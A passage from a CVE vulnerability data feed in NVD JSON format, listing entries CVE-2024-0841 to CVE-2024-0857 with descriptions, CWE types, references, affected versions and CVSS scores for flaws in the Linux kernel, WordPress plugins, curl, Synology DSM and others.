"https://access.redhat.com/security/cve/CVE-2024-0841", "name" : "https://access.redhat.com/security/cve/CVE-2024-0841", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://bugzilla.redhat.com/show_bug.cgi?id=2256490", "name" : "RHBZ#2256490", "refsource" : "", "tags" : [ "Issue Tracking" ] }, { "url" : "https://bugzilla.redhat.com/show_bug.cgi?id=2256490", "name" : "RHBZ#2256490", "refsource" : "", "tags" : [ "Issue Tracking" ] }, { "url" : "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html", "name" : "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html", "refsource" : "", "tags" : [ ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A null pointer dereference flaw was found in the hugetlbfs_fill_super function in the Linux kernel hugetlbfs (HugeTLB pages) functionality. This issue may allow a local user to crash the system or potentially escalate their privileges on the system." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding" : "6.7", "versionEndExcluding" : "6.7.6", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding" : "6.2", "versionEndExcluding" : "6.6.18", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding" : "5.16", "versionEndExcluding" : "6.1.79", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding" : "5.11", "versionEndExcluding" : "5.15.151", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding" : "5.5", "versionEndExcluding" : "5.10.212", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding" : "5.1", "versionEndExcluding" : "5.4.271", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:redhat:enterprise_linux:8.0:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:redhat:enterprise_linux:9.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "LOCAL", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 7.8, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 1.8, "impactScore" : 5.9 } }, "publishedDate" : "2024-01-28T12:15Z", "lastModifiedDate" : "2024-11-21T08:47Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0842", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-834" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://plugins.trac.wordpress.org/changeset/3033242/backuply/trunk/restore_ins.php", "name" : "https://plugins.trac.wordpress.org/changeset/3033242/backuply/trunk/restore_ins.php", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://plugins.trac.wordpress.org/changeset/3033242/backuply/trunk/restore_ins.php", "name" : "https://plugins.trac.wordpress.org/changeset/3033242/backuply/trunk/restore_ins.php", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/1f955d88-ab4c-4cf4-a23b-91119d412716?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/1f955d88-ab4c-4cf4-a23b-91119d412716?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/1f955d88-ab4c-4cf4-a23b-91119d412716?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/1f955d88-ab4c-4cf4-a23b-91119d412716?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The Backuply – Backup, Restore, Migrate and Clone plugin for WordPress is vulnerable to Denial of Service in all versions up to, and including, 1.2.5. This is due to direct access of the backuply/restore_ins.php file and. This makes it possible for unauthenticated attackers to make excessive requests that result in the server running out of resources." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:softaculous:backuply:*:*:*:*:*:wordpress:*:*", "versionEndExcluding" : "1.2.6", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "NONE", "integrityImpact" : "NONE", "availabilityImpact" : "HIGH", "baseScore" : 7.5, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 3.9, "impactScore" : 3.6 } }, "publishedDate" : "2024-02-09T05:15Z", "lastModifiedDate" : "2024-11-21T08:47Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0844", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-22" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://plugins.trac.wordpress.org/browser/popup-more/trunk/classes/Ajax.php#L184", "name" : "https://plugins.trac.wordpress.org/browser/popup-more/trunk/classes/Ajax.php#L184", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://plugins.trac.wordpress.org/browser/popup-more/trunk/classes/Ajax.php#L184", "name" : "https://plugins.trac.wordpress.org/browser/popup-more/trunk/classes/Ajax.php#L184", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/7894a19c-b873-4c5b-8c82-6656cc306ee2?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/7894a19c-b873-4c5b-8c82-6656cc306ee2?source=cve", "refsource" : "", "tags" : [ "Patch", "Third Party Advisory" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/7894a19c-b873-4c5b-8c82-6656cc306ee2?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/7894a19c-b873-4c5b-8c82-6656cc306ee2?source=cve", "refsource" : "", "tags" : [ "Patch", "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The Popup More Popups, Lightboxes, and more popup modules plugin for WordPress is vulnerable to Local File Inclusion in version 2.1.6 via the ycfChangeElementData() function. This makes it possible for authenticated attackers, with administrator-level access and above, to include and execute arbitrary files ending with \"Form.php\" on the server , allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other “safe” file types can be uploaded and included." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:felixmoira:ai_popup:*:*:*:*:*:wordpress:*:*", "versionEndExcluding" : "2.2.5", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "HIGH", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 7.2, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 1.2, "impactScore" : 5.9 } }, "publishedDate" : "2024-02-02T12:15Z", "lastModifiedDate" : "2025-08-15T20:34Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0845", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-79" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://plugins.trac.wordpress.org/browser/pdf-viewer-for-elementor/trunk/widgets/pdfjs-viewer.php#L215", "name" : "https://plugins.trac.wordpress.org/browser/pdf-viewer-for-elementor/trunk/widgets/pdfjs-viewer.php#L215", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://plugins.trac.wordpress.org/browser/pdf-viewer-for-elementor/trunk/widgets/pdfjs-viewer.php#L215", "name" : "https://plugins.trac.wordpress.org/browser/pdf-viewer-for-elementor/trunk/widgets/pdfjs-viewer.php#L215", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://plugins.trac.wordpress.org/browser/pdf-viewer-for-elementor/trunk/widgets/pdfjs-viewer.php#L219", "name" : "https://plugins.trac.wordpress.org/browser/pdf-viewer-for-elementor/trunk/widgets/pdfjs-viewer.php#L219", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://plugins.trac.wordpress.org/browser/pdf-viewer-for-elementor/trunk/widgets/pdfjs-viewer.php#L219", "name" : "https://plugins.trac.wordpress.org/browser/pdf-viewer-for-elementor/trunk/widgets/pdfjs-viewer.php#L219", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://plugins.trac.wordpress.org/browser/pdf-viewer-for-elementor/trunk/widgets/pdf-viewer.php#L256", "name" : "https://plugins.trac.wordpress.org/browser/pdf-viewer-for-elementor/trunk/widgets/pdf-viewer.php#L256", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://plugins.trac.wordpress.org/browser/pdf-viewer-for-elementor/trunk/widgets/pdf-viewer.php#L256", "name" : "https://plugins.trac.wordpress.org/browser/pdf-viewer-for-elementor/trunk/widgets/pdf-viewer.php#L256", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://plugins.trac.wordpress.org/browser/pdf-viewer-for-elementor/trunk/widgets/pdf-viewer.php#L260", "name" : "https://plugins.trac.wordpress.org/browser/pdf-viewer-for-elementor/trunk/widgets/pdf-viewer.php#L260", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://plugins.trac.wordpress.org/browser/pdf-viewer-for-elementor/trunk/widgets/pdf-viewer.php#L260", "name" : "https://plugins.trac.wordpress.org/browser/pdf-viewer-for-elementor/trunk/widgets/pdf-viewer.php#L260", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/4d6f9c80-ef86-4910-a88e-98f2b444ee30?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/4d6f9c80-ef86-4910-a88e-98f2b444ee30?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/4d6f9c80-ef86-4910-a88e-98f2b444ee30?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/4d6f9c80-ef86-4910-a88e-98f2b444ee30?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The PDF Viewer for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the render function in all versions up to, and including, 2.9.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:redlettuce:pdf_viewer_for_elementor:*:*:*:*:*:wordpress:*:*", "versionEndIncluding" : "2.9.3", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "REQUIRED", "scope" : "CHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 5.4, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.3, "impactScore" : 2.7 } }, "publishedDate" : "2024-06-18T03:15Z", "lastModifiedDate" : "2024-11-21T08:47Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0847", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://plugins.trac.wordpress.org/browser/5280-bootstrap-modal-contact-form/trunk/inc/class-sbmm-list-table.php#L142", "name" : "https://plugins.trac.wordpress.org/browser/5280-bootstrap-modal-contact-form/trunk/inc/class-sbmm-list-table.php#L142", "refsource" : "", "tags" : [ ] }, { "url" : "https://plugins.trac.wordpress.org/browser/5280-bootstrap-modal-contact-form/trunk/inc/class-sbmm-list-table.php#L142", "name" : "https://plugins.trac.wordpress.org/browser/5280-bootstrap-modal-contact-form/trunk/inc/class-sbmm-list-table.php#L142", "refsource" : "", "tags" : [ ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/18464483-1d2f-4a4e-a1cc-6c1ddcc2dcf5?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/18464483-1d2f-4a4e-a1cc-6c1ddcc2dcf5?source=cve", "refsource" : "", "tags" : [ ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/18464483-1d2f-4a4e-a1cc-6c1ddcc2dcf5?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/18464483-1d2f-4a4e-a1cc-6c1ddcc2dcf5?source=cve", "refsource" : "", "tags" : [ ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The 5280 Bootstrap Modal Contact Form plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.0. This is due to missing or incorrect nonce validation in class-sbmm-list-table.php. This makes it possible for unauthenticated attackers to bulk delete messages via a forged request granted they can trick a site administrator into performing an action such as clicking on a link." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ ] }, "impact" : { }, "publishedDate" : "2024-05-02T17:15Z", "lastModifiedDate" : "2024-11-21T08:47Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0848", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://plugins.trac.wordpress.org/browser/aa-calculator/trunk/aacalculation.php#L79", "name" : "https://plugins.trac.wordpress.org/browser/aa-calculator/trunk/aacalculation.php#L79", "refsource" : "", "tags" : [ ] }, { "url" : "https://plugins.trac.wordpress.org/browser/aa-calculator/trunk/aacalculation.php#L79", "name" : "https://plugins.trac.wordpress.org/browser/aa-calculator/trunk/aacalculation.php#L79", "refsource" : "", "tags" : [ ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/933ea8a2-3d1d-43a3-bb14-52f37576c9e5?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/933ea8a2-3d1d-43a3-bb14-52f37576c9e5?source=cve", "refsource" : "", "tags" : [ ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/933ea8a2-3d1d-43a3-bb14-52f37576c9e5?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/933ea8a2-3d1d-43a3-bb14-52f37576c9e5?source=cve", "refsource" : "", "tags" : [ ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The AA Cash Calculator plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the ‘invoice’ parameter in all versions up to, and including, 1.0 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ ] }, "impact" : { }, "publishedDate" : "2024-05-02T17:15Z", "lastModifiedDate" : "2024-11-21T08:47Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0849", "ASSIGNER" : "help@fluidattacks.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-22" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://fluidattacks.com/advisories/alesso", "name" : "https://fluidattacks.com/advisories/alesso", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://fluidattacks.com/advisories/alesso", "name" : "https://fluidattacks.com/advisories/alesso", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://github.com/leanote/desktop-app", "name" : "https://github.com/leanote/desktop-app", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://github.com/leanote/desktop-app", "name" : "https://github.com/leanote/desktop-app", "refsource" : "", "tags" : [ "Product" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "Leanote version 2.7.0 allows obtaining arbitrary local files. This is possible because the application is vulnerable to LFR." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:leanote:desktop:2.7.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:N/A:N", "attackVector" : "LOCAL", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "REQUIRED", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "NONE", "availabilityImpact" : "NONE", "baseScore" : 5.0, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 1.3, "impactScore" : 3.6 } }, "publishedDate" : "2024-02-07T03:15Z", "lastModifiedDate" : "2025-05-19T17:15Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0851", "ASSIGNER" : "cve@usom.gov.tr" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://www.usom.gov.tr/bildirim/tr-24-0556", "name" : "https://www.usom.gov.tr/bildirim/tr-24-0556", "refsource" : "", "tags" : [ ] }, { "url" : "https://www.usom.gov.tr/bildirim/tr-24-0556", "name" : "https://www.usom.gov.tr/bildirim/tr-24-0556", "refsource" : "", "tags" : [ ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Grup Arge Energy and Control Systems Smartpower allows SQL Injection.This issue affects Smartpower: through V24.05.27." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ ] }, "impact" : { }, "publishedDate" : "2024-05-27T15:15Z", "lastModifiedDate" : "2024-11-21T08:47Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0852", "ASSIGNER" : "contact@wpscan.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-79" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://wpscan.com/vulnerability/743c4d79-e1d5-4fb0-a17d-296df2c54e8a/", "name" : "https://wpscan.com/vulnerability/743c4d79-e1d5-4fb0-a17d-296df2c54e8a/", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The coreActivity: Activity Logging for WordPress plugin before 1.8.1 does not escape some request data when outputting it back in the admin dashboard, allowing unauthenticated users to perform Stored XSS attack against high privilege users such as admin" } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:dev4press:coreactivity:*:*:*:*:*:wordpress:*:*", "versionEndExcluding" : "1.8.1", "cpe_name" : [ ] } ] } ] }, "impact" : { }, "publishedDate" : "2025-05-15T20:15Z", "lastModifiedDate" : "2025-06-11T19:47Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0853", "ASSIGNER" : "cve@curl.se" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-295" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://curl.se/docs/CVE-2024-0853.html", "name" : "www", "refsource" : "", "tags" : [ "Vendor Advisory" ] }, { "url" : "https://curl.se/docs/CVE-2024-0853.html", "name" : "www", "refsource" : "", "tags" : [ "Vendor Advisory" ] }, { "url" : "https://curl.se/docs/CVE-2024-0853.json", "name" : "json", "refsource" : "", "tags" : [ "Vendor Advisory" ] }, { "url" : "https://curl.se/docs/CVE-2024-0853.json", "name" : "json", "refsource" : "", "tags" : [ "Vendor Advisory" ] }, { "url" : "https://hackerone.com/reports/2298922", "name" : "issue", "refsource" : "", "tags" : [ "Exploit", "Issue Tracking" ] }, { "url" : "https://hackerone.com/reports/2298922", "name" : "issue", "refsource" : "", "tags" : [ "Exploit", "Issue Tracking" ] }, { "url" : "https://security.netapp.com/advisory/ntap-20240307-0004/", "name" : "https://security.netapp.com/advisory/ntap-20240307-0004/", "refsource" : "", "tags" : [ ] }, { "url" : "https://security.netapp.com/advisory/ntap-20240307-0004/", "name" : "https://security.netapp.com/advisory/ntap-20240307-0004/", "refsource" : "", "tags" : [ ] }, { "url" : "https://security.netapp.com/advisory/ntap-20240426-0009/", "name" : "https://security.netapp.com/advisory/ntap-20240426-0009/", "refsource" : "", "tags" : [ ] }, { "url" : "https://security.netapp.com/advisory/ntap-20240426-0009/", "name" : "https://security.netapp.com/advisory/ntap-20240426-0009/", "refsource" : "", "tags" : [ ] }, { "url" : "https://security.netapp.com/advisory/ntap-20240503-0012/", "name" : "https://security.netapp.com/advisory/ntap-20240503-0012/", "refsource" : "", "tags" : [ ] }, { "url" : "https://security.netapp.com/advisory/ntap-20240503-0012/", "name" : "https://security.netapp.com/advisory/ntap-20240503-0012/", "refsource" : "", "tags" : [ ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "curl inadvertently kept the SSL session ID for connections in its cache even when the verify status (*OCSP stapling*) test failed. A subsequent transfer to\nthe same hostname could then succeed if the session ID cache was still fresh, which then skipped the verify status check." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:haxx:curl:8.5.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "NONE", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 5.3, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 3.9, "impactScore" : 1.4 } }, "publishedDate" : "2024-02-03T14:15Z", "lastModifiedDate" : "2025-06-20T20:15Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0854", "ASSIGNER" : "security@synology.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-601" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://www.synology.com/en-global/security/advisory/Synology_SA_24_02", "name" : "Synology-SA-24:02 DSM", "refsource" : "", "tags" : [ "Vendor Advisory" ] }, { "url" : "https://www.synology.com/en-global/security/advisory/Synology_SA_24_02", "name" : "Synology-SA-24:02 DSM", "refsource" : "", "tags" : [ "Vendor Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "URL redirection to untrusted site ('Open Redirect') vulnerability in file access component in Synology DiskStation Manager (DSM) before 6.2.4-25556-8, 7.0.1-42218-7, 7.1.1-42962-7 and 7.2.1-69057-2 allows remote authenticated users to conduct phishing attacks via unspecified vectors." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:synology:diskstation_manager:*:*:*:*:*:*:*:*", "versionEndExcluding" : "7.2.1-69057-2", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "REQUIRED", "scope" : "CHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 5.4, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.3, "impactScore" : 2.7 } }, "publishedDate" : "2024-01-24T10:15Z", "lastModifiedDate" : "2025-01-14T19:29Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0855", "ASSIGNER" : "contact@wpscan.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "NVD-CWE-noinfo" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://wpscan.com/vulnerability/5d5da91e-3f34-46b0-8db2-354a88bdf934/", "name" : "https://wpscan.com/vulnerability/5d5da91e-3f34-46b0-8db2-354a88bdf934/", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://wpscan.com/vulnerability/5d5da91e-3f34-46b0-8db2-354a88bdf934/", "name" : "https://wpscan.com/vulnerability/5d5da91e-3f34-46b0-8db2-354a88bdf934/", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The Spiffy Calendar WordPress plugin before 4.9.9 doesn't check the event_author parameter, and allows any user to alter it when creating an event, leading to deceiving users/admins that a page was created by a Contributor+." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:spiffyplugins:spiffy_calendar:*:*:*:*:*:wordpress:*:*", "versionEndExcluding" : "4.9.9", "cpe_name" : [ ] } ] } ] }, "impact" : { }, "publishedDate" : "2024-02-27T09:15Z", "lastModifiedDate" : "2025-05-01T14:25Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0856", "ASSIGNER" : "contact@wpscan.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-352" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://wpscan.com/vulnerability/eb383600-0cff-4f24-8127-1fb118f0565a/", "name" : "https://wpscan.com/vulnerability/eb383600-0cff-4f24-8127-1fb118f0565a/", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://wpscan.com/vulnerability/eb383600-0cff-4f24-8127-1fb118f0565a/", "name" : "https://wpscan.com/vulnerability/eb383600-0cff-4f24-8127-1fb118f0565a/", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The Appointment Booking Calendar WordPress plugin before 1.3.83 does not have CSRF checks in some places, which could allow attackers to make logged in users perform unwanted actions via CSRF attacks such as adding a booking to the calendar without paying." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:codepeople:appointment_booking_calendar:*:*:*:*:*:wordpress:*:*", "versionEndExcluding" : "1.3.83", "cpe_name" : [ ] } ] } ] }, "impact" : { }, "publishedDate" : "2024-03-20T05:15Z", "lastModifiedDate" : "2025-05-05T18:41Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0857", "ASSIGNER" : "cve@usom.gov.tr" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] 